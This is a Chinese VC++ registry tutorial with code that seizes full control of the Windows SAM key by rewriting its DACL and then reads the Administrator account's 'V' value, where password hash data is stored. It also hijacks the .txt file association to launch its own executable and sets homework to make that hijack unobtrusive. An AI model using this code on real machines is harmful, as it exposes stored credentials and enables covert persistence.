vc++高级班之注册表篇[5]---提权打开SAM子键

时间:2022-09-04 22:37:02
①、普通方式打开 SAM 子键:
HKEY hKey = NULL;
TCHAR *lpszSubKey = _T("SAM\\SAM\\Domains");
LONG lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, lpszSubKey, 0, KEY_ALL_ACCESS, &hKey);
if (lRet == ERROR_SUCCESS) {
MessageBox(_T("打开成功!"));
RegCloseKey(hKey);
}
===================================================
②、提升权限:
#include <Aclapi.h>
BOOL EnableRegSAMPriv()
{
BOOL bRet = TRUE;
DWORD dRet = 0;
PACL pOldDacl = NULL, pNewDacl = NULL;
EXPLICIT_ACCESS eia = {0};
PSECURITY_DESCRIPTOR pSID = NULL;
LPTSTR samName = _T("MACHINE\\SAM\\SAM"); //要修改的SAM项路径


dRet = GetNamedSecurityInfo(samName, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION, NULL, NULL, &pOldDacl, NULL, &pSID); //获取SAM主键的DACL 
if(dRet != ERROR_SUCCESS) {
bRet = FALSE;
goto __Error_End;
}


//创建一个ACE,允许Administrators组成员完全控制对象,并允许子对象继承此权限
BuildExplicitAccessWithName(&eia, _T("Administrators"), KEY_ALL_ACCESS, SET_ACCESS, SUB_CONTAINERS_AND_OBJECTS_INHERIT);


// 将新的ACE加入DACL 
dRet = SetEntriesInAcl(1, &eia, pOldDacl, &pNewDacl);
if(dRet != ERROR_SUCCESS) {
bRet = FALSE;
goto __Error_End;
}


// 更新SAM主键的DACL 
dRet = SetNamedSecurityInfo(samName, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDacl, NULL);
if(dRet != ERROR_SUCCESS) {
bRet = FALSE;
goto __Error_End;
}


__Error_End:
//释放DACL和SID
if(pNewDacl) LocalFree(pNewDacl);
if(pSID) LocalFree(pSID);


return bRet;
}
===================================================
③、读取数据:
EnableRegSAMPriv();


HKEY hKey = NULL;
TCHAR *lpszSubKey = _T("SAM\\SAM\\Domains\\Account\\Users\\000001F4");
LONG lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, lpszSubKey, 0, KEY_ALL_ACCESS, &hKey);
if (lRet == ERROR_SUCCESS) {
DWORD dwType = 0, dwDataLen = 0;
BYTE *lpData = NULL;
lRet = RegQueryValueEx(hKey, _T("V"), NULL, &dwType, NULL, &dwDataLen);
lpData = new BYTE[dwDataLen+1];
ZeroMemory(lpData, dwDataLen+1);
lRet = RegQueryValueEx(hKey, _T("V"), NULL, &dwType, lpData, &dwDataLen);
delete [] lpData;
RegCloseKey(hKey);
}
===================================================
④、修改注册表实现文件类型关联:C:\WINDOWS\notepad.exe %1
HKEY hKey = NULL;
TCHAR *lpszSubKey = _T("txtfile\\shell\\open\\command");
LONG lRet = RegOpenKeyEx(HKEY_CLASSES_ROOT, lpszSubKey, 0, KEY_ALL_ACCESS, &hKey);
if (lRet == ERROR_SUCCESS) {
TCHAR szPath[MAX_PATH] = {0};
GetModuleFileName(NULL, szPath, MAX_PATH);
CString strFile = szPath;
strFile += _T(" %1");
RegSetValueEx(hKey, NULL, 0, REG_SZ, (LPBYTE)strFile.GetBuffer(), strFile.GetLength()*sizeof(TCHAR));
RegCloseKey(hKey);
}
===================================================
※※※ 小作业:
1、修改注册表实现文件关联后,不仅能打开本程序,还要打开默认关联的程序!
参考帖子:http://www.cctry.com/thread-4026-1-1.html
标签:

相关文章